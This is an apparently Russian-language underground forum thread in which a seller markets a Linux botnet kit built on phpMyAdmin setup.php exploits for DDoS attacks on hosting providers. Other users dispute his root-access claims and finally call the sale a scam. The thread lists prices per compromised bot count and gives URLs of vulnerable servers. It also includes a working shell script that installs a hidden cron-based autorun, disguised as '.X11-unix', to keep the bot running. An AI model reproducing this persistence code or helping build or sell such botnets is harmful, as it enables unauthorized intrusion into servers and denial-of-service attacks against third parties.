Блек LinuQ - Комплекс создания Linux ботнета

Отслеживать
2 TrueUser, это бесполезно, "вы просто не понимаете" :D
2 Ar3s весьма странно, каким образом такие горе-кодеры проходят проверки и не получают заслуженный бан за фуфло про права и продажу паблик-уязвимостей?
 
Mr.Bogus
Все наверно потому-что гарант видел сплоиты в глаза и не нашел их в паблике. Увидел реальный результат =)

Показал ему как 2, только что сбрученные бота ложат hoster ;)

А Вы опять таки стараетесь кому-то что-то доказать. Если уязвимости в паблике - прошу показать Вас эту систему. Жду.
Покажите мне систему сканирования, определения уязвимости и выполнения сплоита в автоматическом режиме при старте всего лишь с 1 команды (под любую ОСь)

Я более чем уверен что Вы ничего найти не сможете. Если сможете - я тут-же выкладу свой комплекс в паблик и закрою продажу

P.S. Я вот не понимаю твоей логики. Уже прошел 2 гарантов из 4. Еще один сказал что сможет проверить софт через 3-4 дня. С 4 гарантом не хочу иметь дела, так как он на ксакепе.

На 3 приват форумах уже прошел проверку. Думаете все гаранты идиоты, а Вы такие умные?
 
LinXeR
Один из гарантов некомпетентен, "гаранты приватных форумов" - это мне ни о чём не говорит.
В адеквате из тех, кто видел софт, пока единственный только Ar3s написал "Ничего приватного или сверх сложного я не увидел", следовательно используется публичная уязвимость (скорее всего phpMyAdmin unserialize() arbitrary PHP code execution); про привелегии root, которые по вашим словам магическим образом даёт php-скрипт PMA, он ничего не написал, адекватным людям и так понятно, что это пустой трёп. Если б вы разбирались в вопросе и нормально написали без вранья про рутовые привелегии, я б в этом топике вообще ниче не писал, а так уж извольте терпеть моё присутствие :)
 
Раскрою пару карт и не более:
http://186.204.80.26/phpmyadmin/scripts/setup.php
http://163.247.80.30/phpmyadmin/scripts/setup.php
Именно это используется в первой части сплоита. Вторая часть добивает рут из юникса и позволяет выполнится коду из под рута.
Не путаем уязвимость setup.php с пабликовой. В данной версии сплоита поддерживаются ВСЕ последние PMA

Вышла новая версия архива. Обновление получили все клиенты бесплатно.

Новые цены:
Старый архив (Пробив 24.*.*.* составляет 30 ботов (тесты показывают способность убить на 48 часов сайт, размещенный на hoster.ru)): 300$
Новый архив (Новая версия). Пробив 24.*.*.* составляет 50 ботов: 500$

Заказной архив больше не поступает в продажу. Связано это с тем, что некоторые клиенты выкинули сплоиты наружу.

Добавлено в [time]1309370777[/time]
В общем. Кому что-то не нравится или видит паблик: Проходите мимо, собирайте свои архивы. Но судя по тому, что 99% тут сидящих никогда в руках не держали Linux-ботнет - все ясно.

Допустим все компоненты системы были бы паблик. Сможете собрать подобную систему, что за 6 часов сможет собрать Вам ботнет, который повалит любой хостинг с каналом до 5 ГБит?
 
Собственно прецендент возник только лишь из-за одной вещи.
Никто вроде не давит на паблик сплойт (и иже с ним), никто не говорит что скрипт автоматического сканирования не авторского производства.
Весь сыр бор разгорелся из-за привилегий рута которые "якобы" получают боты на пробитых тачках.

Неужели не проще сделать "архив" не для каких то там ддос ботнетов, а для реально полезных и дорогих рутовых дедиков?
У меня есть небольшой тест для ТС. Если все что написано им сущая правда, то сделать бэкдор на базе уже готового ботнета не сложно. Так вот, предоставив аресу "архив" с таким функционалом, чтобы проверяющий смог реально зайти на пробитые тачки под рутом после сканирования его собственного диапазона я реально возьму свои слова обратно и больше не буду соваться в приватные технологии ТС.
Я считаю, что люди у нас на форуме разбирающиеся в этом вопросе, подтвердят эффективность такого теста. :P
 
TrueUser
Пожалуй Вы правы =)
Это скорее всего единственный пост с адекватным советом.

Вся проблема в том, что я не сказал о наличии в новом архиве сплоита для получения рута на машинах под линуксом.

Впрочем я послушаюсь Вашего совета и начну продажи чисто архива с полным перечнем возможностей и его реализации.
Что касается теста - я сейчас сделаю мини-скрипт который даст Вам SSH-Бекдор.
Думаю завтра, послезавтра смогу выдать гарантам тестовые дедики.

Надеюсь возражений не будет если я возьму IP адреса ботов, который уже были сбручены. Сбручу их на Ваших глазах без скана (Скан займет много времени) и покажу бекдор?

Впрочем в моем боте есть удаленное исполнение команд. Единственные поддерживаемые на данный момент 4 команды:
wget
cd
./ - запуск любой программы
unzip

Сейчас доделаю бота для вывода whoami.
Конечно некоторые смогут заговорить о подделке, но я, без вранья, стараюсь вести максимально чистые по схеме клиент-продавец дела.
 
Mr.Bogus Вы частично правы. Софт полностью паблик. Насчет рута и сплоитов - спорный момент. Мне удалось идентифицировать только один из сплоитов. И то косвенно. Применить к своему серваку не удалось.
Поэтому прошу LinXeR не спешить с выводами.
Почему я поставил проверку - продается комплекс а не бот. Человек вправе продавать все что угодно. Хоть надписи на заборе, если при этом он не барыжничает. А он проделал определенную работу для этого проекта, и именно это он продает вкупе с пабликом. Покупать или нет - дело каждого. Я лично считаю, что цена несколько завышена. По-крайней мере на старую версию. Насчет новой ничего не скажу т.к. не видел ее.
 
Кстати. Сегодня, по рекомендации знакомго, переделал авторан под крон:
Код: 
#!/bin/sh
pwd > m.dir
dir=$(cat m.dir)
echo "* * * * * $dir/.X11-unix >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/.***ICE-linux; then
pid=\$(cat $dir/.***linux)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
perl .***unix &>/dev/null" > .X11-unix
chmod u+x .X11-unix
rm -fr m.dir cron.d autorun.s ip dns start vhosts
Надеюсь теперь вопросов будет меньше. Рут не обязателен

Думаю в течении недели реализовать следующее:
Поочередный перебор всех известных паблик и некоторых приват сплоитов под PMA с возможностью удаленного выполнения команд.
Создать новую ветку продаж (Старые темы будут удалены):
Продажа только комплекса для брута, а так-же полной инструкции по возможному применению с ссылками на все известные боты: DDoS, Remote Code Execution, Socks e.t.c.
Так-же будет бесплатно выложен мною переделанный бот.

Уберу из архива сплоит для получения рута, но оставлю данный код в закомментированом инклуде (Если Вам нужно будет исполнения кода под рутом, откроете комментарий и пропишите нужный, выполняемый код).
Авторана буду добиваться с помощью cron
 
TrueUser
Я объяснял выше что это относится к новому архиву.
Насчет рута к компьютеру проверяющего: Метасплоит поможет ИМХО.
Думаю более интерестно будет, если проверяющий выберет из всего ботнета пару IP и на его глазах через тимвивер получим рут
 
При чем тут метасплойт? Арес тестил ваш софт на своем собственном сервере.
Применить к своему серваку не удалось.
Ну вот поставит он себе PMA и натравит сканер на айпи своего сервера. В итоге должен получить рут бекдор к своему же серверу. Думаю я понятно теперь пояснил.
 
Очень много слов, непоследовательных жестов и прочего.
Функционал как собственно и работоспособность софта до сих пор не ясны...
Редкостный неадекват, не понимаю почему вы его не забаните.
 
Left4Dead
К Вашему большому сожалению - неадекватность у меня замечена не была

http://ru.wiktionary.org/wiki/%D0%BD%D0%B5...%81%D1%82%D1%8C
Я бы скорее применил этот термин к Вам из-за Вашего бронепоезда в голове
 
Давайте не будем обмениваться в теме любезностями а просто напросто решим один единственный вопрос - соответствует ли действительности заявленный в посте функционал софта. Метод я предложил. Арес согласен, ждем ТС, если проверки такого рода не будет произведено, то я считаю адекватным шагом выставить топику статус не прошедшего проверку. Вуаля.
 
По-теме:
1. прекращаем треп. Обсуждения и критика - это хорошо, но начинает вылезать за рамки. Вот-вот пойдут полноценные личностные оскорбления!
2. Я согласен на еще один тест кастрированного нового архива. Суть следующая: ТС модифицирует свой пакет скриптов таким образом что бы можно было зайти под рутом на пробитой машине. Включаем тимвьювер, я придумываю диапазон ip которой будем сканить. Онлайн сижу и смотрю как сканит и пробивает. Затем захожу на любой пробитый ip(можно несколько для точности). Если вижу что права рутовые - вырезаю нафиг весь текущий треп. Если нет ни одного рута - думаю над тем, как наказать ТС за несоответствие. Плюс, в этой теме мы прочитаем извинения. Думаю это всех устроит.
3. Если ТС не хочет такого теста - значит сам пусть вырезает из 1 поста все упоминания про рута и т.д. Затем я вырезаю весь этот флейм.
 
налицо откровенный кидок,
приватный пак от публичного отличается только тем что в приватно 3 дополнительных экспа под пма, которые найдены были мной на ачате.

ни о каких рутах речи и быть не может.
вот дампы и лог диалогов заодно

http://www.sendspace.com/file/9jp2fm
http://www.everfall.com/paste/id.php?5fh5w3evven3
Дык это же всё сразу понятно было, жаль что вы попали на деньги! Спасибо, что выложили этот шлак в паблик, теперь этот кидала никого больше не разведёт. :lol2:
 
admin


Напишите ответ...
Верх